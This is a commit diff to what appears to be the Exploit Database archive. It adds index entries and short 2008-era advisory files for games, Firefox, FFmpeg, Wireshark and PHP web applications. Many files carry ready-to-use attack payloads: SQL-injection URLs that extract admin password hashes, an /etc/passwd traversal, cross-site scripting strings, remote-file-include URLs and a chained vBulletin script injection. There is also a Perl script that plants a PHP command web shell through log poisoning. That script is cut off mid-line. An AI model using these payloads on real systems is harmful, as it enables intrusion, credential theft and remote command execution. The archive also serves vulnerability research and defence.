Updated 03_04_2014

files.csv

@@ -28743,6 +28743,8 @@ id,file,description,date,author,platform,type,port
 31954,platforms/php/webapps/31954.txt,"Benja CMS 0.1 /admin/admin_edit_submenu.php URL XSS",2008-06-23,"CWH Underground",php,webapps,0
 31955,platforms/php/webapps/31955.txt,"Benja CMS 0.1 /admin/admin_new_submenu.php URL XSS",2008-06-23,"CWH Underground",php,webapps,0
 31956,platforms/php/webapps/31956.txt,"Benja CMS 0.1 /admin/admin_edit_topmenu.php URL XSS",2008-06-23,"CWH Underground",php,webapps,0
+31957,platforms/multiple/dos/31957.txt,"World in Conflict 1.008 - NULL Pointer Remote Denial of Service Vulnerability",2008-06-23,"Luigi Auriemma",multiple,dos,0
+31958,platforms/multiple/dos/31958.txt,"SunAge 1.8.1 - Multiple Denial of Service Vulnerabilities",2008-06-23,"Luigi Auriemma",multiple,dos,0
 31959,platforms/linux/local/31959.txt,"Perl 'rmtree()' Function Local Insecure Permissions Vulnerability",2008-06-23,"Frans Pop",linux,local,0
 31960,platforms/php/webapps/31960.txt,"A+ PHP Scripts News Management System 0.3 Multiple Input Validation Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
 31961,platforms/php/webapps/31961.txt,"GDL 4.2 - Multiple Vulnerabilities",2014-02-27,ByEge,php,webapps,80
@@ -28764,6 +28766,7 @@ id,file,description,date,author,platform,type,port
 31981,platforms/php/webapps/31981.txt,"PolyPager 0.9.51/1.0 'nr' Parameter Cross Site Scripting Vulnerability",2008-06-26,"CWH Underground",php,webapps,0
 31982,platforms/php/webapps/31982.txt,"Webuzo 2.1.3 - Multiple Vulnerabilities",2014-02-28,Mahendra,php,webapps,80
 31983,platforms/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",multiple,webapps,32400
+31984,platforms/linux/dos/31984.txt,"Mozilla Firefox 3.0 - Malformed JPEG File Denial of Service Vulnerability",2008-06-27,"Beenu Arora",linux,dos,0
 31985,platforms/hardware/webapps/31985.txt,"MICROSENS Profi Line Switch 10.3.1 - Privilege Escalation",2014-02-28,"SEC Consult",hardware,webapps,0
 31986,platforms/php/webapps/31986.txt,"Wordpress VideoWhisper 4.27.3 - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80
 31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY gefebt.exe Remote Code Execution",2014-02-28,metasploit,windows,remote,80
@@ -28775,6 +28778,7 @@ id,file,description,date,author,platform,type,port
 31995,platforms/windows/webapps/31995.txt,"Oracle Demantra 12.2.1 - Database Credentials Disclosure",2014-03-01,Portcullis,windows,webapps,8080
 31996,platforms/windows/remote/31996.txt,"Microsoft Internet Explorer 7/8 Beta 1 Frame Location Cross Domain Security Bypass Vulnerability",2008-06-27,"Eduardo Vela",windows,remote,0
 31997,platforms/windows/remote/31997.txt,"AceFTP 3.80.3 'LIST' Command Directory Traversal Vulnerability",2008-06-27,"Tan Chew Keong",windows,remote,0
+31998,platforms/multiple/dos/31998.txt,"S.T.A.L.K.E.R Shadow of Chernobyl 1.0006 - Multiple Remote Vulnerabilities",2008-06-28,"Luigi Auriemma",multiple,dos,0
 31999,platforms/multiple/dos/31999.txt,"IBM Tivoli Directory Server 6.1.x Adding 'ibm-globalAdminGroup' Entry Denial of Service Vulnerability",2008-06-30,anonymous,multiple,dos,0
 32000,platforms/linux/dos/32000.txt,"OpenLDAP <= 2.3.41 BER Decoding Remote Denial of Service Vulnerability",2008-06-30,"Cameron Hotchkies",linux,dos,0
 32001,platforms/php/webapps/32001.txt,"RSS-aggregator 1.0 admin/fonctions/supprimer_flux.php IdFlux Parameter SQL Injection",2008-06-30,"CWH Underground",php,webapps,0
@@ -28782,4 +28786,32 @@ id,file,description,date,author,platform,type,port
 32003,platforms/php/webapps/32003.txt,"RSS-aggregator 1.0 admin/fonctions/ Direct Request Administrator Authentication Bypass",2008-06-30,"CWH Underground",php,webapps,0
 32004,platforms/php/webapps/32004.txt,"FaName 1.0 index.php Multiple Parameter XSS",2008-06-30,"Jesper Jurcenoks",php,webapps,0
 32005,platforms/php/webapps/32005.txt,"FaName 1.0 page.php name Parameter XSS",2008-06-30,"Jesper Jurcenoks",php,webapps,0
+32006,platforms/multiple/dos/32006.txt,"Wireshark 1.0.0 - Multiple DoS",2008-06-30,"Noam Rathus",multiple,dos,0
 32009,platforms/unix/dos/32009.txt,"QNX Neutrino RTOS 6.3 'phgrafx' Local Buffer Overflow Vulnerability",2008-07-01,"Filipe Balestra",unix,dos,0
+32010,platforms/php/webapps/32010.txt,"Joomla! and Mambo 'com_is' 1.0.1 Component Multiple SQL Injection Vulnerabilities",2008-07-02,"H-T Team",php,webapps,0
+32011,platforms/php/webapps/32011.txt,"DodosMail 2.5 'dodosmail.php' Local File Include Vulnerability",2008-07-07,ahmadbady,php,webapps,0
+32012,platforms/linux/remote/32012.txt,"Netrw 125 Vim Script Multiple Command Execution Vulnerabilities",2008-07-07,"Jan Minar",linux,remote,0
+32013,platforms/php/webapps/32013.txt,"Zoph 0.7.2.1 Unspecified SQL Injection",2008-07-07,"Julian Rodriguez",php,webapps,0
+32014,platforms/php/webapps/32014.txt,"Zoph 0.7.2.1 search.php _off Parameter XSS",2008-07-07,"Julian Rodriguez",php,webapps,0
+32015,platforms/php/webapps/32015.txt,"PHP-Nuke 4ndvddb 0.91 Module 'id' Parameter SQL Injection Vulnerability",2008-07-07,Lovebug,php,webapps,0
+32016,platforms/php/webapps/32016.pl,"fuzzylime (cms) 3.01 'blog.php' Local File Include Vulnerability",2008-07-07,Cod3rZ,php,webapps,0
+32017,platforms/php/webapps/32017.html,"VBulletin <= 3.7.1 admincp/faq.php Injection adminlog.php XSS",2008-07-08,"Jessica Hope",php,webapps,0
+32018,platforms/linux/dos/32018.txt,"Multiple Vendors Unspecified SVG File Processing - Denial of Service Vulnerability",2008-07-08,"Kristian Hermansen",linux,dos,0
+32019,platforms/linux/dos/32019.txt,"FFmpeg libavformat 'psxstr.c' STR Data Heap Based Buffer Overflow Vulnerability",2008-07-09,astrange,linux,dos,0
+32020,platforms/php/webapps/32020.txt,"PageFusion 1.5 'index.php' Multiple Cross Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",php,webapps,0
+32021,platforms/php/webapps/32021.txt,"Xomol CMS 1.2 'index.php' HTML Injection and Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",php,webapps,0
+32022,platforms/php/webapps/32022.txt,"TGS Content Management 0.3.2r2 index.php Multiple Parameter XSS",2008-07-09,"Julian Rodriguez",php,webapps,0
+32023,platforms/php/webapps/32023.txt,"TGS Content Management 0.3.2r2 login.php Multiple Parameter XSS",2008-07-09,"Julian Rodriguez",php,webapps,0
+32024,platforms/php/webapps/32024.txt,"V-webmail 1.6.4 includes/pear/Mail/RFC822.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0
+32025,platforms/php/webapps/32025.txt,"V-webmail 1.6.4 includes/pear/Net/Socket.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0
+32026,platforms/php/webapps/32026.txt,"V-webmail 1.6.4 includes/pear/XML/Parser.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0
+32027,platforms/php/webapps/32027.txt,"V-webmail 1.6.4 includes/pear/XML/Tree.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0
+32028,platforms/php/webapps/32028.txt,"V-webmail 1.6.4 includes/pear/Mail/mimeDecode.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0
+32029,platforms/php/webapps/32029.txt,"V-webmail 1.6.4 includes/pear/Console/Getopt.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0
+32030,platforms/php/webapps/32030.txt,"V-webmail 1.6.4 includes/pear/System.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0
+32031,platforms/php/webapps/32031.txt,"V-webmail 1.6.4 includes/pear/Log.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0
+32032,platforms/php/webapps/32032.txt,"V-webmail 1.6.4 includes/pear/File.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0
+32033,platforms/php/webapps/32033.txt,"V-webmail 1.6.4 includes/prepend.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0
+32034,platforms/php/webapps/32034.txt,"V-webmail 1.6.4 includes/cachedConfig.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0
+32035,platforms/php/webapps/32035.txt,"V-webmail 1.6.4 includes/prepend.php CONFIG[includes] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0
+32036,platforms/php/webapps/32036.txt,"V-webmail 1.6.4 includes/email.list.search.php CONFIG[includes] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0

platforms/linux/dos/31984.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29984/info
+
+Mozilla Firefox is prone to a remote denial-of-service vulnerability.
+
+Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions.
+
+This issue affects Firefox 3 running on Ubuntu Linux 8.04; other versions running on different platforms may also be affected. 
+
+http://www.exploit-db.com/sploits/31984.jpg

platforms/linux/dos/32018.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30149/info
+
+Multiple vendors' SVG implementations are prone to an unspecified denial-of-service vulnerability.
+
+This issue arises when the software handles maliciously crafted SVG images.
+
+According to reports, the latest versions of Firefox, Evince, EoG, and GIMP are vulnerable. 
+
+http://www.exploit-db.com/sploits/32018.svg

platforms/linux/dos/32019.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30154/info
+
+The 'libavformat' library from FFmpeg is prone to a remote heap-based buffer-overflow vulnerability because of insufficient boundary checks when parsing STR data.
+
+Remote attackers can exploit this issue by enticing victims into opening maliciously crafted STR files with an application that uses the affected library.
+
+Successful exploits may allow attackers to execute arbitrary code within the context of an affected application. Failed exploit attempts will likely result in a denial of service. 
+
+http://www.exploit-db.com/sploits/32019.iki

platforms/linux/remote/32012.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30115/info
+
+Netrw is prone to multiple command-execution vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+Successfully exploiting these issues can allow an attacker to execute arbitrary commands with the privileges of the user running the affected application.
+
+Netrw 125 is vulnerable; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/32012.tar.bz2

platforms/multiple/dos/31957.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29888/info
+
+World in Conflict is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.
+
+An attacker could exploit this issue to crash the affected application, denying service to legitimate users.
+
+This issue affects World in Conflict 1.008; other versions may also be affected. 
+
+http://www.exploit-db.com/sploits/31957.zip

platforms/multiple/dos/31958.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29889/info
+
+SunAge is prone to multiple denial-of-service vulnerabilities.
+
+Successfully exploiting these issues allows remote attackers to crash affected game servers, denying service to legitimate users.
+
+SunAge 1.08.1 is vulnerable; previous versions may also be affected. 
+
+http://www.exploit-db.com/sploits/31958.zip

platforms/multiple/dos/31998.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/29997/info
+
+S.T.A.L.K.E.R is prone to multiple remote vulnerabilities:
+
+- A stack-based buffer-overflow vulnerability
+- An integer-overflow vulnerability
+- A denial-of-service vulnerability
+
+An attacker can exploit these issues to execute arbitrary code within the context of the affected application or crash the application, denying service to legitimate users.
+
+S.T.A.L.K.E.R Shadow of Chernobyl 1.0006 is vulnerable; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/31998.zip

platforms/multiple/dos/32006.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/30020/info
+
+Wireshark is prone to multiple vulnerabilities, including an information-disclosure issue and denial-of-service issues.
+
+Exploiting these issues may allow attackers to obtain potentially sensitive information, cause crashes, and deny service to legitimate users of the application. Attackers may be able to leverage some of these vulnerabilities to execute arbitrary code, but this has not been confirmed.
+
+These issues affect Wireshark 0.9.5 up to and including 1.0.0. 
+
+http://www.exploit-db.com/sploits/32006-1.pcap
+http://www.exploit-db.com/sploits/32006-2.pcap
+http://www.exploit-db.com/sploits/32006-3.pcap

platforms/php/webapps/32010.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30063/info
+
+The 'com_is' component for Joomla! and Mambo is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+These issues affect 'com_is' 1.0.1; other versions may also be affected. 
+
+http://www.example.com/index.php?option=com_is&task=model&marka=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8,9,10,11,12,13 from/**/".$magic."/**
+http://www.example.com/index.php?option=com_is&task=motor&motor=-1%20union%20select%201,2,password,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users-- 

platforms/php/webapps/32011.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30112/info
+
+DodosMail is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to execute local script code in the context of the application. This may allow the attacker to obtain sensitive information that may aid in further attacks.
+
+DodosMail 2.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/path/dodosmail.php?dodosmail_header_file=/../../../etc/passwd 

platforms/php/webapps/32013.txt

@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/30116/info
+
+Zoph is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Zoph 0.7.2.1 is vulnerable; other versions may also be affected.
+
+UPDATE (July 2, 2009): The vendor disputes that Zoph is affected by these issues. Recent versions of Zoph are reported not vulnerable.
+
+The following login credentials are reported to trigger this issue:
+
+username: '--
+password: '-- 

platforms/php/webapps/32014.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/30116/info
+ 
+Zoph is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities.
+ 
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+Zoph 0.7.2.1 is vulnerable; other versions may also be affected.
+ 
+UPDATE (July 2, 2009): The vendor disputes that Zoph is affected by these issues. Recent versions of Zoph are reported not vulnerable.
+
+http://www.example.com/demo/search.php?_action=search&_off=[EvilScript]

platforms/php/webapps/32015.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30120/info
+
+The '4ndvddb' module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+This issue affects 4ndvddb 0.91; other versions may also be affected.
+
+http://www.example.com/modules.php?name=4ndvddb&rop=show_dvd&id=1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,3,4,5,6,7,8,9,10%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A 

platforms/php/webapps/32016.pl

@@ -0,0 +1,41 @@
+source: http://www.securityfocus.com/bid/30121/info
+
+'fuzzylime (cms)' is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary local script code. This can allow the attacker to obtain sensitive information that may aid in further attacks.
+
+This issue affects fuzzylime (cms) 3.01a; other versions may also be affected. 
+
+#!/usr/bin/perl
+# Fuzzylime CMS 3.01 LFI / RCE
+# author  : Cod3rZ
+# website : http://cod3rz.helloweb.eu
+#
+# http://[site]/blog.php?file=../[file]\0
+# LFI TO RCE
+use LWP::UserAgent;
+ system("cls");
+#system("clear");
+ print " -------------------------------------------------\n";
+ print " Fuzzylime CMS 3.01 LFI / RCE                     \n";
+ print " Powered by Cod3rZ                                \n";
+ print " http://cod3rz.helloweb.eu                        \n";
+ print " -------------------------------------------------\n";
+ print " Insert Site (http://site.com/):                  \n ";
+ chomp($site = <STDIN>);
+ print " -------------------------------------------------\n";
+ print " Insert Logs path                                 \n ";
+ chomp($path = <STDIN>);
+ print " -------------------------------------------------\n";
+ 
+ #Infect Logs
+ $lwp = LWP::UserAgent->new;
+ $siten = $site.'/blog.php?file=';
+ $ua = $lwp->get($site.'coderz <?php passthru(stripslashes($_GET[cmd])); ?> /coderz');
+ #Control
+ $ua = $lwp->get($site.$path.'%00');
+ if($ua->content =~ m/cod3rz/) {
+ print " Ok ".$site." is infected                         \n";
+ print " -------------------------------------------------\n";
+ print " ".$siten.$path."&cmd=[command]\\0                 \n";
+ print " --

platforms/php/webapps/32017.html

@@ -0,0 +1,48 @@
+source: http://www.securityfocus.com/bid/30134/info
+
+vBulletin is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Versions prior to vBulletin 3.7.2 PL1 and 3.6.10 PL3 are vulnerable. 
+
+<html>
+<body>
+<img 
+src="http://http://www.example.com/vB/upload/admincp/faq.php/0?do=<script>/*" 
+/>
+<img
+src="http://http://www.example.com/vB/upload/admincp/faq.php/1?do=*/a%3D&#039;document.wri&#039;/*"
+/>
+<img
+src="http://http://www.example.com/vB/upload/admincp/faq.php/2?do=*/b%3D&#039;te(%22<script
+&#039;/*" />
+<img
+src="http://http://www.example.com/vB/upload/admincp/faq.php/3?do=*/c%3D&#039;src=http://&#039;/*"
+/>
+<!--edit to match your data -->
+<img
+src="http://http://www.example.com/vB/upload/admincp/faq.php/4?do=*/d%3D&#039;http://www.example.com/&#039;/*"
+/>
+<img 
+src="http://http://www.example.com/vB/upload/admincp/faq.php/5?do=*/e%3D&#039;&#039;/*" 
+/>
+<img
+src="http://http://www.example.com/vB/upload/admincp/faq.php/6?do=*/f%3D&#039;t.js></scrip&#039;/*"
+/>
+<!-- end edit -->
+<img
+src="http://http://www.example.com/vB/upload/admincp/faq.php/7?do=*/g%3D&#039;t>%22)&#039;/*" 
+/>
+<img
+src="http://http://www.example.com/vB/upload/admincp/faq.php/8?do=*/h%3Da%2Bb%2Bc%2Bd%2Be%2Bf%2Bg/*"
+/>
+<img 
+src="http://http://www.example.com/vB/upload/admincp/faq.php/9?do=*/eval(h)/*" 
+/>
+<img 
+src="http://http://www.example.com/vB/upload/admincp/faq.php/a0?do=*/</script>" 
+/>
+</body>
+</html>
+

platforms/php/webapps/32020.txt

@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/30155/info
+
+PageFusion is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+PageFusion 1.5 is vulnerable; other versions may also be affected. 
+
+http://www.pagefusion.com//index.php?A=pf_login&SA=edit&PID=0000000001&PGID=rdWCFSLF9E&MID=14&acct_fname=%
+<http://www.pagefusion.com//index.php?A=pf_login&SA=edit&PID=0000000001&PGID=rdWCFSLF9E&MID=14&acct_fname=%>">/><script>alert(/xs/)</script>&acct_lname=T
+est&acct_username=hack3d&acct_email=hack3db0y%40gmail.com
+<http://40gmail.com>&acct_time_zone=-0600
+
+
+http://www.pagefusion.com//index.php?A=pf_login&SA=edit&PID=0000000001&PGID=rdWCFSLF9E&MID=14&acct_fname=%333&acct_lname=
+<http://www.pagefusion.com//index.php?A=pf_login&SA=edit&PID=0000000001&PGID=rdWCFSLF9E&MID=14&acct_fname=%333&acct_lname=>">/><script>alert(/xs/)</scrip
+t>&acct_username=hack3d&acct_email=hack3db0y%40gmail.com
+<http://40gmail.com>&acct_time_zone=-0600
+
+http://www.pagefusion.com/index.php?PID=">/><script>alert(/xs/)</script>
+http://www.pagefusion.com/index.php?PID=0000000001&PGID=
+<http://www.pagefusion.com/index.php?PID=0000000001&PGID=>">/><script>alert(/xs/)</script>
+
+http://www.pagefusion.com/index.php?rez=">/><script>alert(/xs/)</script>&jsd=1&js=Yes&profile=1
+

platforms/php/webapps/32021.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30156/info
+
+Xomol CMS is prone to an HTML-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
+
+Xomol CMS 1.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?op=tellafriend&current_url=">/><script>alert(/xssed/)</script>

platforms/php/webapps/32022.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/30157/info
+
+TGS Content Management is prone to an HTML-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user; other attacks are also possible.
+
+TGS Content Management 0.3.2r2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cms/index.php?site=account&goodmsg=>">/><script>alert(/xs/)</script>
+http://www.example.com/cms/index.php?site=filemanager&msg=>">/><script>alert(/xs/)</script>
+http://www.example.com/cms/index.php?site=filemanager&dir=>">/><script>alert(/xs/)</script>
+http://www.example.com/cms/index.php?site=usermanager&option=show&id=>">/><script>alert(/xs/)</script>

platforms/php/webapps/32023.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30157/info
+ 
+TGS Content Management is prone to an HTML-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user; other attacks are also possible.
+ 
+TGS Content Management 0.3.2r2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cms/login.php?previous_page=/cms/index.php?msg=">/><script>alert(/xs/)</script>
+http://www.example.com/cms/login.php?previous_page=/cms/index.php?goodmsg=">/><script>alert(/xs/)</script>

platforms/php/webapps/32024.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30162/info
+
+V-webmail is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+V-webmail 1.6.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/includes/pear/Mail/RFC822.php?CONFIG[pear_dir]=http://www.example2.com

platforms/php/webapps/32025.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30162/info
+ 
+V-webmail is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+ 
+V-webmail 1.6.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/includes/pear/Net/Socket.php?CONFIG[pear_dir]=http://www.example2.com

platforms/php/webapps/32026.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30162/info
+  
+V-webmail is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+  
+Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+  
+V-webmail 1.6.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/includes/pear/XML/Parser.php?CONFIG[pear_dir]=http://www.example2.com

platforms/php/webapps/32027.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30162/info
+   
+V-webmail is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+   
+Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+   
+V-webmail 1.6.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/includes/pear/XML/Tree.php?CONFIG[pear_dir]=http://www.example2.com

platforms/php/webapps/32028.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30162/info
+    
+V-webmail is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+    
+Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+    
+V-webmail 1.6.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/includes/pear/Mail/mimeDecode.php?CONFIG[pear_dir]=http://www.example2.com

platforms/php/webapps/32029.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30162/info
+     
+V-webmail is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+     
+Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+     
+V-webmail 1.6.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/includes/pear/Console/Getopt.php?CONFIG[pear_dir]=http://www.example2.com

platforms/php/webapps/32030.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30162/info
+      
+V-webmail is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+      
+Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+      
+V-webmail 1.6.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/includes/pear/System.php?CONFIG[pear_dir]=http://www.example2.com

platforms/php/webapps/32031.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30162/info
+       
+V-webmail is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+       
+Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+       
+V-webmail 1.6.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/includes/pear/Log.php?CONFIG[pear_dir]=http://www.example2.com

platforms/php/webapps/32032.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30162/info
+        
+V-webmail is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+        
+Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+        
+V-webmail 1.6.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/includes/pear/File.php?CONFIG[pear_dir]=http://www.example2.com

platforms/php/webapps/32033.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30162/info
+         
+V-webmail is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+         
+Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+         
+V-webmail 1.6.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/includes/prepend.php?CONFIG[pear_dir]=http://www.example2.com

platforms/php/webapps/32034.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30162/info
+          
+V-webmail is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+          
+Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+          
+V-webmail 1.6.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/includes/cachedConfig.php?CONFIG[pear_dir]=http://www.example2.com 

platforms/php/webapps/32035.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30162/info
+           
+V-webmail is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+           
+Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+           
+V-webmail 1.6.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/includes/prepend.php?CONFIG[includes]=http://www.example2.com

platforms/php/webapps/32036.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30162/info
+            
+V-webmail is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+            
+Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+            
+V-webmail 1.6.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/includes/email.list.search.php?CONFIG[includes]=http://www.example2.com